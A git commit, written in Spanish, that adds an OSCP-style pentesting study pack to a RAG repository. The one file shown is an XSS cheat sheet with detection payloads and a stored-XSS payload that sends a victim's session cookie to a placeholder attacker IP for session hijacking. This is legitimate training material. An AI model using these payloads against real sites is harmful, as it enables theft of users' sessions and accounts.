saber: pack de metodologia publico (conocimiento/) + doc del RAG

El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
sito 2026-08-16 17:58:41 +02:00
parent 12987539a4
commit 7e06ce46cf
76 changed files with 2682 additions and 8 deletions

View file

@ -0,0 +1,28 @@
# XSS (Cross-Site Scripting)
> Inyectas JavaScript que se ejecuta en el navegador de otro usuario. En OSCP pesa menos que SQLi/RCE, pero aparece (sobre todo para robar sesión de un admin). Vector de Hacking web.
## Tipos
```
Reflected → tu payload vuelve en la respuesta de ESA petición (?q=<script>...)
Stored → se guarda (comentario, perfil) y se dispara a quien lo vea (más potente)
DOM → el JS del cliente mete tu input en el DOM sin sanear
```
## Detección y payloads
```html
<script>alert(1)</script>
<img src=x onerror=alert(document.domain)>
"><svg onload=alert(1)>
```
Prueba primero un marcador inofensivo y mira si se **renderiza** o se escapa (en Burp Repeater e Intruder).
## Para qué sirve en OSCP
- **Robar la cookie de sesión** de un admin (XSS stored en un panel que el admin revisa):
```html
<script>new Image().src='http://TU_IP/c='+document.cookie</script>
```
La recibes en tu `python3 -m http.server` → la usas en Authentication attacks.
- A veces el panel admin tiene una función que escala a RCE / File upload bypass.
Relacionado: SSTI · Authentication attacks · OSCP MOC